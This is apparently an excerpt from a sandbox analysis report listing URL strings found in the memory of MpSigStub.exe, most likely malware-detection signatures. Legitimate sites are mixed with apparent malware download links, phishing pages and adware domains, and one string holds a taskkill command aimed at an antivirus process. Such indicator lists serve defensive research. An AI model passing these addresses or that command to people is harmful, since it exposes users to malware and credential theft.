Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.fb.beirutmarathonculture.org/aos/aos/aos/index.htm)
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.fbcom.review/d/9.doc
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htm
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htmxM
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.fixarabul.com
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.fixarasana.com
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://www.flvpro.com/?aff=
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://www.friend-card.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://www.friend-greeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://www.friendgreeting.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.gamedanji.cn/ExeIni
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://www.geocities.com/joke_haha2001
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://www.ggt.int.pld
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.gistery.trade/sys/designbolts.exe
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.cn/p/?q=
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://www.goldentech.co.kr
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.goldwindos2000.com/hkeraone/hker.htmwidht=0height=0
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://www.goodtimesplayer.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?complete=1&hl=zh-CN&inlang=zh-CN&newwindow=1&q=
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com.tr/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/search?complete=1&q=%s
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%s
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 00000023.00000003.18242976274.0000015B0B50C000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.gooo.ru
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.gratisweb.com/vaisefuder00
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://www.greyhathacker.net/tools/
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.hao123.com/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://www.hebogo.com/ac
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.hoarafushionline.net/extractf.php?x=
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.hoarafushionline.net/habeys.exe
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.hotelelun.cl/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.htylk.esy.es/nobe/downloaddocument-adobesignin.html
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.icq.com
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://www.idownline.com/members/idownline
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://www.ilikeclick.com/track/click.php?dts_code=
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.infoodesk.org/wizzy/wizzy/mailmine.html)
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://www.instantmp3player.com
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.com
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.comx
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.ipvoips.com/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.ischrome.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.isihodiernatunisi.com/online/zixmessage.htm)
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.itau.com.br
Source: MpSigStub.exe, 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://www.jafiduto.cz/images/wordpress.php
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.jejuseongahn.org/hboard4/data/cheditor/badu/alpha.php?v
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.judios.org/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.kaolabao.net/bo/update.ini
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://www.kerstingutleder.at//p.o/next.php
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://www.klikspaandelft.nl/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.komikeglence.com/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.kreher.tv/dhes/images/images/
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.kuku530.com/?
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.kuku530.com/?Favorites
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.labsus.org/images/web/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/cgi
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/products/
Source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/xa
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://www.luckbird8.cn/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.lwstats.com/11/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.lycos.com
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://www.macadwarecleaner.com
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://www.maicaidao.com
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://www.mail-kunren.jp/sample2018jb1e/index.html?src=
Source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp String found in binary or memory: http://www.maliciousurl-695dba18-2bb9-429a-a9a6-fe89a0eb945e.com/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.manyakpc.com
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.mapquest.com
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://www.mathrandomfloor/photo.txt?buttonnumdiskmlkjihgfed:
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.maxwebsearch.com/s?i_
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://www.mcafee.com93.73.148.17eset.com93.73.148.17
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.mcmoney2012.com/fxf09.php
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.mediabusnetwork.com/phandler.php?pid=
Source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://www.mediafire.com/download/
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: http://www.megafileupload.com/
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.megasesso.ittaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.mickyfastdl.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://www.microname.co.kr
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.mindcrash.it/upload/galleriafotografica
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.mlb.com
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://www.mmviewer.com
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://www.mmviewer.com/post/
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://www.moliv.com.br/stat/email0702/
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.monitoreatufamilia.com
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.monster.com
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://www.mootolola.com/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://www.more4apps.com/
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.info
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.info/
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.net
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?pc=MSERT1
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.mt-download.com/mtrslib2.js
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.mva.by/tags/ariscanin1.e
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://www.mvps.org/vb
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.my123.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.my8899.com/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://www.my_wallpaper_location.com/wallpaper.bmp
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.mymediacenter.in/crime/index.php
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 00000023.00000003.18307074601.0000015B1AA4C000.00000004.00000001.sdmp String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.namu-in.com//bbs/data/init.htm
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.natwest.com/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.nba.com
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.nerddogueto.com.br
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.netscape.com
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.niepicowane.pl/
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.nytimes.com
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.o2.co.uk/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
